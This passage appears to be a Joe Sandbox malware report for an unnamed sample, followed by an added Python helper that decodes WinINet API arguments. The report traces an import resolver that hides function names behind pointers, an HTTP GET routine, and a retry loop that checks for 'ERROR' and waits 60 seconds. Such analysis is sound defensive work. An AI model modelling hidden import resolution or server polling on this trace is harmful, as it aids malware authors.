                            • Instruction ID: 5cf26d08c785ec9b0d3d326c4a9f0f4e1ed096289aa6da4abb3ce0d5ff52cb54
                            • Opcode Fuzzy Hash: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                            • Instruction Fuzzy Hash: B7F044F1944208AFC700DF95DD45FAEBBB8F704751F100159FA05E3680C7781904CBA2
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: the same fourteen associated dumps as listed for the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                            • Instruction ID: 767420209e0aeff40f29aeb1bc64090218ba4525e7fb29b236cd7ba78641afad
                            • Opcode Fuzzy Hash: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                            • Instruction Fuzzy Hash: DED05EB490130CDBCB00EFE0D849AEDBB78FB08315F000554D909B2340EA346486CAA6

                            Control-flow Graph (recovered from the graph image; the Executed / Not Executed colouring of the blocks is not preserved as text)
                            Blocks (id address-range calls): 633 3c9c10-3c9c1a; 634 3ca036-3ca0ca LoadLibraryA * 8; 635 3c9c20-3ca031 GetProcAddress * 43; 636 3ca0cc-3ca141 GetProcAddress * 5; 637 3ca146-3ca14d; 638 3ca216-3ca21d; 639 3ca153-3ca211 GetProcAddress * 8; 640 3ca21f-3ca293 GetProcAddress * 5; 641 3ca298-3ca29f; 642 3ca2a5-3ca332 GetProcAddress * 6; 643 3ca337-3ca33e; 644 3ca41f-3ca426; 645 3ca344-3ca41a GetProcAddress * 9; 646 3ca428-3ca49d GetProcAddress * 5; 647 3ca4a2-3ca4a9; 648 3ca4dc-3ca4e3; 649 3ca4ab-3ca4d7 GetProcAddress * 2; 650 3ca515-3ca51c; 651 3ca4e5-3ca510 GetProcAddress * 2; 652 3ca612-3ca619; 653 3ca522-3ca60d GetProcAddress * 10; 654 3ca67d-3ca684; 655 3ca61b-3ca678 GetProcAddress * 4; 656 3ca69e-3ca6a5; 657 3ca686-3ca699 GetProcAddress; 658 3ca708-3ca709; 659 3ca6a7-3ca703 GetProcAddress * 4
                            Edges: 633->634, 633->635, 634->636, 634->637, 635->634, 636->637, 637->638, 637->639, 638->640, 638->641, 639->638, 640->641, 641->642, 641->643, 642->643, 643->644, 643->645, 644->646, 644->647, 645->644, 646->647, 647->648, 647->649, 648->650, 648->651, 649->648, 650->652, 650->653, 651->650, 652->654, 652->655, 653->652, 654->656, 654->657, 655->654, 656->658, 656->659, 657->656, 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01075750), ref: 003C9C2D
                            • GetProcAddress.KERNEL32(74DD0000,01075A70), ref: 003C9C45
                            • GetProcAddress.KERNEL32(74DD0000,01089670), ref: 003C9C5E
                            • GetProcAddress.KERNEL32(74DD0000,010896D0), ref: 003C9C76
                            • GetProcAddress.KERNEL32(74DD0000,01089610), ref: 003C9C8E
                            • GetProcAddress.KERNEL32(74DD0000,01089640), ref: 003C9CA7
                            • GetProcAddress.KERNEL32(74DD0000,0107B748), ref: 003C9CBF
                            • GetProcAddress.KERNEL32(74DD0000,0108CF00), ref: 003C9CD7
                            • GetProcAddress.KERNEL32(74DD0000,0108D0B0), ref: 003C9CF0
                            • GetProcAddress.KERNEL32(74DD0000,0108CE88), ref: 003C9D08
                            • GetProcAddress.KERNEL32(74DD0000,0108D068), ref: 003C9D20
                            • GetProcAddress.KERNEL32(74DD0000,010758D0), ref: 003C9D39
                            • GetProcAddress.KERNEL32(74DD0000,01075A30), ref: 003C9D51
                            • GetProcAddress.KERNEL32(74DD0000,010756F0), ref: 003C9D69
                            • GetProcAddress.KERNEL32(74DD0000,01075710), ref: 003C9D82
                            • GetProcAddress.KERNEL32(74DD0000,0108D0C8), ref: 003C9D9A
                            • GetProcAddress.KERNEL32(74DD0000,0108CF18), ref: 003C9DB2
                            • GetProcAddress.KERNEL32(74DD0000,0107B7C0), ref: 003C9DCB
                            • GetProcAddress.KERNEL32(74DD0000,010758F0), ref: 003C9DE3
                            • GetProcAddress.KERNEL32(74DD0000,0108CE10), ref: 003C9DFB
                            • GetProcAddress.KERNEL32(74DD0000,0108CFD8), ref: 003C9E14
                            • GetProcAddress.KERNEL32(74DD0000,0108CFF0), ref: 003C9E2C
                            • GetProcAddress.KERNEL32(74DD0000,0108CEA0), ref: 003C9E44
                            • GetProcAddress.KERNEL32(74DD0000,01075990), ref: 003C9E5D
                            • GetProcAddress.KERNEL32(74DD0000,0108CED0), ref: 003C9E75
                            • GetProcAddress.KERNEL32(74DD0000,0108CEB8), ref: 003C9E8D
                            • GetProcAddress.KERNEL32(74DD0000,0108D008), ref: 003C9EA6
                            • GetProcAddress.KERNEL32(74DD0000,0108CF30), ref: 003C9EBE
                            • GetProcAddress.KERNEL32(74DD0000,0108D020), ref: 003C9ED6
                            • GetProcAddress.KERNEL32(74DD0000,0108CF48), ref: 003C9EEF
                            • GetProcAddress.KERNEL32(74DD0000,0108D038), ref: 003C9F07
                            • GetProcAddress.KERNEL32(74DD0000,0108CFA8), ref: 003C9F1F
                            • GetProcAddress.KERNEL32(74DD0000,0108D050), ref: 003C9F38
                            • GetProcAddress.KERNEL32(74DD0000,0108A690), ref: 003C9F50
                            • GetProcAddress.KERNEL32(74DD0000,0108D080), ref: 003C9F68
                            • GetProcAddress.KERNEL32(74DD0000,0108CE28), ref: 003C9F81
                            • GetProcAddress.KERNEL32(74DD0000,01075910), ref: 003C9F99
                            • GetProcAddress.KERNEL32(74DD0000,0108D0E0), ref: 003C9FB1
                            • GetProcAddress.KERNEL32(74DD0000,01075730), ref: 003C9FCA
                            • GetProcAddress.KERNEL32(74DD0000,0108D098), ref: 003C9FE2
                            • GetProcAddress.KERNEL32(74DD0000,0108CE58), ref: 003C9FFA
                            • GetProcAddress.KERNEL32(74DD0000,01075930), ref: 003CA013
                            • GetProcAddress.KERNEL32(74DD0000,01075D30), ref: 003CA02B
                            • LoadLibraryA.KERNEL32(0108CF60,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA03D
                            • LoadLibraryA.KERNEL32(0108CDF8,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA04E
                            • LoadLibraryA.KERNEL32(0108CFC0,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA060
                            • LoadLibraryA.KERNEL32(0108CE40,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA072
                            • LoadLibraryA.KERNEL32(0108CF90,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA083
                            • LoadLibraryA.KERNEL32(0108CE70,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA095
                            • LoadLibraryA.KERNEL32(0108CF78,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0A7
                            • LoadLibraryA.KERNEL32(0108CEE8,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0B8
                            • GetProcAddress.KERNEL32(75290000,01075C30), ref: 003CA0DA
                            • GetProcAddress.KERNEL32(75290000,0108D158), ref: 003CA0F2
                            • GetProcAddress.KERNEL32(75290000,010891A8), ref: 003CA10A
                            • GetProcAddress.KERNEL32(75290000,0108D2C0), ref: 003CA123
                            • GetProcAddress.KERNEL32(75290000,01075B50), ref: 003CA13B
                            • GetProcAddress.KERNEL32(73480000,0107B5E0), ref: 003CA160
                            • GetProcAddress.KERNEL32(73480000,01075D50), ref: 003CA179
                            • GetProcAddress.KERNEL32(73480000,0107BA68), ref: 003CA191
                            • GetProcAddress.KERNEL32(73480000,0108D2F0), ref: 003CA1A9
                            • GetProcAddress.KERNEL32(73480000,0108D380), ref: 003CA1C2
                            • GetProcAddress.KERNEL32(73480000,01075B90), ref: 003CA1DA
                            • GetProcAddress.KERNEL32(73480000,01075CB0), ref: 003CA1F2
                            • GetProcAddress.KERNEL32(73480000,0108D338), ref: 003CA20B
                            • GetProcAddress.KERNEL32(752C0000,01075C90), ref: 003CA22C
                            • GetProcAddress.KERNEL32(752C0000,01075B10), ref: 003CA244
                            • GetProcAddress.KERNEL32(752C0000,0108D1B8), ref: 003CA25D
                            • GetProcAddress.KERNEL32(752C0000,0108D290), ref: 003CA275
                            • GetProcAddress.KERNEL32(752C0000,01075E50), ref: 003CA28D
                            • GetProcAddress.KERNEL32(74EC0000,0107B9C8), ref: 003CA2B3
                            • GetProcAddress.KERNEL32(74EC0000,0107B7E8), ref: 003CA2CB
                            • GetProcAddress.KERNEL32(74EC0000,0108D308), ref: 003CA2E3
                            • GetProcAddress.KERNEL32(74EC0000,01075B70), ref: 003CA2FC
                            • GetProcAddress.KERNEL32(74EC0000,01075AF0), ref: 003CA314
                            • GetProcAddress.KERNEL32(74EC0000,0107B810), ref: 003CA32C
                            • GetProcAddress.KERNEL32(75BD0000,0108D188), ref: 003CA352
                            • GetProcAddress.KERNEL32(75BD0000,01075AB0), ref: 003CA36A
                            • GetProcAddress.KERNEL32(75BD0000,010892C8), ref: 003CA382
                            • GetProcAddress.KERNEL32(75BD0000,0108D398), ref: 003CA39B
                            • GetProcAddress.KERNEL32(75BD0000,0108D170), ref: 003CA3B3
                            • GetProcAddress.KERNEL32(75BD0000,01075E10), ref: 003CA3CB
                            • GetProcAddress.KERNEL32(75BD0000,01075C10), ref: 003CA3E4
                            • GetProcAddress.KERNEL32(75BD0000,0108D140), ref: 003CA3FC
                            • GetProcAddress.KERNEL32(75BD0000,0108D2A8), ref: 003CA414
                            • GetProcAddress.KERNEL32(75A70000,01075DD0), ref: 003CA436
                            • GetProcAddress.KERNEL32(75A70000,0108D248), ref: 003CA44E
                            • GetProcAddress.KERNEL32(75A70000,0108D3B0), ref: 003CA466
                            • GetProcAddress.KERNEL32(75A70000,0108D320), ref: 003CA47F
                            • GetProcAddress.KERNEL32(75A70000,0108D350), ref: 003CA497
                            • GetProcAddress.KERNEL32(75450000,01075BB0), ref: 003CA4B8
                            • GetProcAddress.KERNEL32(75450000,01075AD0), ref: 003CA4D1
                            • GetProcAddress.KERNEL32(75DA0000,01075E30), ref: 003CA4F2
                            • GetProcAddress.KERNEL32(75DA0000,0108D368), ref: 003CA50A
                            • GetProcAddress.KERNEL32(6F070000,01075CD0), ref: 003CA530
                            • GetProcAddress.KERNEL32(6F070000,01075CF0), ref: 003CA548
                            • GetProcAddress.KERNEL32(6F070000,01075BF0), ref: 003CA560
                            • GetProcAddress.KERNEL32(6F070000,0108D200), ref: 003CA579
                            • GetProcAddress.KERNEL32(6F070000,01075BD0), ref: 003CA591
                            • GetProcAddress.KERNEL32(6F070000,01075C50), ref: 003CA5A9
                            • GetProcAddress.KERNEL32(6F070000,01075DF0), ref: 003CA5C2
                            • GetProcAddress.KERNEL32(6F070000,01075D10), ref: 003CA5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 003CA5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 003CA607
                            • GetProcAddress.KERNEL32(75AF0000,0108D3C8), ref: 003CA629
                            • GetProcAddress.KERNEL32(75AF0000,010892A8), ref: 003CA641
                            • GetProcAddress.KERNEL32(75AF0000,0108D260), ref: 003CA659
                            • GetProcAddress.KERNEL32(75AF0000,0108D230), ref: 003CA672
                            • GetProcAddress.KERNEL32(75D90000,01075D70), ref: 003CA693
                            • GetProcAddress.KERNEL32(6CFD0000,0108D278), ref: 003CA6B4
                            • GetProcAddress.KERNEL32(6CFD0000,01075B30), ref: 003CA6CD
                            • GetProcAddress.KERNEL32(6CFD0000,0108D110), ref: 003CA6E5
                            • GetProcAddress.KERNEL32(6CFD0000,0108D1D0), ref: 003CA6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: the same fourteen associated dumps as listed for the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                            • Instruction ID: 4bb6e9cd1f57b81c338ee2403ed6a875b4906cc145f0a81b7eccb3901f5db369
                            • Opcode Fuzzy Hash: 6383f7b9e8cfbae68a4be6e69121fdeece06ffb1962837e64f20d18b8ba68a07
                            • Instruction Fuzzy Hash: 1B626BF5502201AFC748EFA9ED88D7637F9F76C241704851AA60DC3269D77DA80AEB13

                            Control-flow Graph (recovered from the graph image; the Executed / Not Executed colouring of the blocks is not preserved as text)
                            Blocks (id address-range calls): 1033 3b6280-3b630b call 3ca7a0, call 3b47b0, call 3ca740, InternetOpenA, StrCmpCA; 1040 3b630d; 1041 3b6314-3b6318; 1042 3b6509-3b6525 call 3ca7a0, call 3ca800 * 2; 1043 3b631e-3b6342 InternetConnectA; 1062 3b6528-3b652d; 1045 3b6348-3b634c; 1046 3b64ff-3b6503 InternetCloseHandle; 1047 3b635a; 1048 3b634e-3b6358; 1050 3b6364-3b6392 HttpOpenRequestA; 1052 3b6398-3b639c; 1053 3b64f5-3b64f9 InternetCloseHandle; 1055 3b639e-3b63bf InternetSetOptionA; 1056 3b63c5-3b6405 HttpSendRequestA, HttpQueryInfoA; 1058 3b642c-3b644b call 3c8940; 1059 3b6407-3b6427 call 3ca740, call 3ca800 * 2; 1066 3b64c9-3b64e9 call 3ca740, call 3ca800 * 2; 1067 3b644d-3b6454; 1069 3b64c7-3b64ef InternetCloseHandle; 1070 3b6456-3b6480 InternetReadFile; 1073 3b648b; 1074 3b6482-3b6489; 1078 3b648d-3b64c5 call 3ca9b0, call 3ca8a0, call 3ca800
                            Edges: 1033->1040, 1033->1041, 1040->1041, 1041->1042, 1041->1043, 1042->1062, 1043->1045, 1043->1046, 1045->1047, 1045->1048, 1046->1042, 1047->1050, 1048->1050, 1050->1052, 1050->1053, 1052->1055, 1052->1056, 1053->1046, 1055->1056, 1056->1058, 1056->1059, 1058->1066, 1058->1067, 1059->1062, 1066->1062, 1067->1069, 1067->1070, 1069->1053, 1070->1073, 1070->1074, 1073->1069, 1074->1073, 1074->1078, 1078->1070
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003B63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B646D
                            • InternetCloseHandle.WININET(00000000), ref: 003B64EF
                            • InternetCloseHandle.WININET(00000000), ref: 003B64F9
                            • InternetCloseHandle.WININET(00000000), ref: 003B6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: the same fourteen associated dumps as listed for the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                            • Instruction ID: 57935fe887dc330a179c915dc9b75f6ca30ed45f3ffea34f32011d032ee37fa3
                            • Opcode Fuzzy Hash: fc97f45a9bb0fdf2832f41c7a2b094de4e0813d26ed7df77efc03b8cb2afa5f2
                            • Instruction Fuzzy Hash: F4717F71A00308ABDB25EB90DC49FEE7778FB44704F108059F209AB591DBB86E85DF52

                            Control-flow Graph (recovered from the graph image; the Executed / Not Executed colouring of the blocks is not preserved as text)
                            Blocks (id address-range calls): 1090 3c5510-3c5577 call 3c5ad0, call 3ca820 * 3, call 3ca740 * 4; 1106 3c557c-3c5583; 1107 3c5585-3c55b6 call 3ca820, call 3ca7a0, call 3b1590, call 3c51f0; 1108 3c55d7-3c564c call 3ca740 * 2, call 3b1590, call 3c52c0, call 3ca8a0, call 3ca800, call 3caad0, StrCmpCA; 1124 3c55bb-3c55d2 call 3ca8a0, call 3ca800; 1134 3c5693-3c56a9 call 3caad0, StrCmpCA; 1138 3c564e-3c568e call 3ca7a0, call 3b1590, call 3c51f0, call 3ca8a0, call 3ca800; 1139 3c57dc-3c5844 call 3ca8a0, call 3ca820 * 2, call 3b1670, call 3ca800 * 4, call 3c6560, call 3b1550; 1140 3c56af-3c56b6; 1270 3c5ac3-3c5ac6; 1144 3c56bc-3c56c3; 1145 3c57da-3c585f call 3caad0, StrCmpCA; 1149 3c571e-3c5793 call 3ca740 * 2, call 3b1590, call 3c52c0, call 3ca8a0, call 3ca800, call 3caad0, StrCmpCA; 1150 3c56c5-3c5719 call 3ca820, call 3ca7a0, call 3b1590, call 3c51f0, call 3ca8a0, call 3ca800; 1164 3c5865-3c586c; 1165 3c5991-3c59f9 call 3ca8a0, call 3ca820 * 2, call 3b1670, call 3ca800 * 4, call 3c6560, call 3b1550; 1250 3c5795-3c57d5 call 3ca7a0, call 3b1590, call 3c51f0, call 3ca8a0, call 3ca800; 1171 3c598f-3c5a14 call 3caad0, StrCmpCA; 1172 3c5872-3c5879; 1201 3c5a28-3c5a91 call 3ca8a0, call 3ca820 * 2, call 3b1670, call 3ca800 * 4, call 3c6560, call 3b1550; 1202 3c5a16-3c5a21 Sleep; 1179 3c587b-3c58ce call 3ca820, call 3ca7a0, call 3b1590, call 3c51f0, call 3ca8a0, call 3ca800; 1180 3c58d3-3c5948 call 3ca740 * 2, call 3b1590, call 3c52c0, call 3ca8a0, call 3ca800, call 3caad0, StrCmpCA; 1275 3c594a-3c598a call 3ca7a0, call 3b1590, call 3c51f0, call 3ca8a0, call 3ca800
                            Edges: 1090->1106, 1106->1107, 1106->1108, 1107->1124, 1108->1134, 1108->1138, 1124->1134, 1134->1139, 1134->1140, 1138->1134, 1139->1270, 1140->1144, 1140->1145, 1144->1149, 1144->1150, 1145->1164, 1145->1165, 1149->1145, 1149->1250, 1150->1145, 1164->1171, 1164->1172, 1165->1270, 1171->1201, 1171->1202, 1172->1179, 1172->1180, 1179->1171, 1180->1171, 1180->1275, 1201->1270, 1202->1106, 1250->1145, 1275->1171
                            APIs
                              • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                              • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C56A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5857
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5228
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                              • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C532F
                              • Part of subcall function 003C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                              • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C5383
                              • Part of subcall function 003C52C0: lstrlen.KERNEL32(00000000), ref: 003C53AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003C5A0C
                            • Sleep.KERNEL32(0000EA60), ref: 003C5A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: the same fourteen associated dumps as listed for the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                            • Instruction ID: 54d980bb9d910f255f9e6129d7615281ed3b0eb0958e1cb51f41fc8a8079e50b
                            • Opcode Fuzzy Hash: ad45730601d9dd0c5998603a06b1e725334b1a4e0bcd6f02a921d7db567908ce
                            • Instruction Fuzzy Hash: D4E13E729106089BCB16FBA0DC56FFD7738AB54304F50812CB506EA591EF346E4DDBA2
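The "APIs" lists above record the WinINet and kernel32 calls with raw hexadecimal arguments, so reading the import resolver at 0x3C9C10, the HTTP routine at 0x3B6280, the retry loop at 0x3C5510 (Sleep) and the command handler at 0x3C17A0 (StrCmpCA against "block", then ExitProcess) means looking each constant up by hand. The helper below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses lines in the report's own "Api.MODULE(arg,...), ref: callsite" shape and annotates the numeric arguments with the constant names from the Windows SDK header wininet.h. The sample lines are copied from the lists above; the parser's tolerance for the "Part of subcall function" prefix is an assumption about the report format, and no attempt is made to map module handles to DLL names beyond what a plaintext import name implies.

```python
"""Decode the API-call lines in this report's "APIs" lists (added analyst helper)."""
import re
from collections import Counter

# Constructed sample: lines copied from the "APIs" lists of the functions at
# 0x3C9C10, 0x3B6280, 0x3C5510 and 0x3C17A0 in this report.
REPORT_LINES = """\
GetProcAddress.KERNEL32(74DD0000,01075750), ref: 003C9C2D
GetProcAddress.KERNEL32(74DD0000,01075A70), ref: 003C9C45
LoadLibraryA.KERNEL32(0108CF60,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA03D
GetProcAddress.KERNEL32(75290000,01075C30), ref: 003CA0DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 003CA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 003CA607
InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003B63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B646D
Sleep.KERNEL32(0000EA60), ref: 003C5A1B
StrCmpCA.SHLWAPI(00000000,block), ref: 003C17C5
ExitProcess.KERNEL32 ref: 003C17D1
"""
# "Api.MODULE(arg,...), ref: callsite", optionally prefixed by a bullet or "Part of subcall function X:" (assumed).
LINE_RE = re.compile(r"^\s*•?\s*(?:Part of subcall function \w+:\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # how the sandbox prints a pointer or handle
UNKNOWN = "? (not recovered)"           # the sandbox prints "?" for values it did not capture

# Constant values from the Windows SDK wininet.h.
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                 0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
                 0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
SET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
              6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS",
              41: "INTERNET_OPTION_USER_AGENT"}
QUERY_INFO = {1: "HTTP_QUERY_CONTENT_TYPE", 5: "HTTP_QUERY_CONTENT_LENGTH",
              19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}

def parse_api_lines(text):
    """Report lines -> dicts with api, module, args (as printed) and ref (call site)."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": m.group("ref").upper()})
    return calls

def to_int(arg):
    try:
        return int(arg, 16)
    except ValueError:
        return None

def dec(arg):
    v = to_int(arg)
    return UNKNOWN if v is None else str(v)

def name_of(value, table):
    return UNKNOWN if value is None else table.get(value, hex(value))

def flag_names(value, table):
    """OR-ed flag word -> 'A|B', with any bits the table does not name kept as hex."""
    if value is None:
        return UNKNOWN
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)   # keys are disjoint single bits, so their sum is the known mask
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def str_arg(label, s):
    """A string argument is a literal the sandbox could read, or an un-dereferenced pointer."""
    return "%s=%s (%s)" % (label, s, "pointer; name not visible to the sandbox" if HEX8.match(s) else "plaintext")

def decode_call(call):
    """Notes for the arguments that carry a constant, in each API's documented argument order."""
    api, a = call["api"], call["args"]
    if api == "GetProcAddress":
        return [str_arg("lpProcName", a[1])]
    if api == "InternetOpenA":
        return ["dwAccessType=" + name_of(to_int(a[1]), OPEN_TYPE)]
    if api == "InternetConnectA":
        port = to_int(a[2])
        return ["nServerPort=" + ("INTERNET_INVALID_PORT_NUMBER (service default)" if port == 0 else dec(a[2])),
                "dwService=" + name_of(to_int(a[5]), SERVICE)]
    if api == "HttpOpenRequestA":
        return ["lpszVerb=" + a[1], "dwFlags=" + flag_names(to_int(a[6]), REQUEST_FLAGS)]
    if api == "InternetSetOptionA":
        return ["dwOption=" + name_of(to_int(a[1]), SET_OPTION), "dwBufferLength=" + dec(a[3])]
    if api == "HttpQueryInfoA":
        level = to_int(a[1])   # mask off HTTP_QUERY_FLAG_* modifiers in the top nibble
        return ["dwInfoLevel=" + name_of(None if level is None else level & 0x0FFFFFFF, QUERY_INFO)]
    if api == "InternetReadFile":
        return ["dwNumberOfBytesToRead=" + dec(a[2])]
    if api == "Sleep":
        ms = to_int(a[0])
        return ["dwMilliseconds=" + (UNKNOWN if ms is None else "%d (%g s)" % (ms, ms / 1000))]
    if api == "StrCmpCA":
        return ["psz2=" + a[1]]
    return []

def summarize_resolver(calls):
    """GetProcAddress calls per module handle, plus the names the sandbox saw as plaintext."""
    per_module, plaintext, loads = Counter(), [], 0
    for c in calls:
        if c["api"] == "GetProcAddress":
            per_module[c["args"][0]] += 1
            if not HEX8.match(c["args"][1]):
                plaintext.append((c["args"][0], c["args"][1]))
        elif c["api"] == "LoadLibraryA":
            loads += 1
    return {"per_module": dict(per_module), "plaintext": plaintext, "loadlibrary_calls": loads}
```

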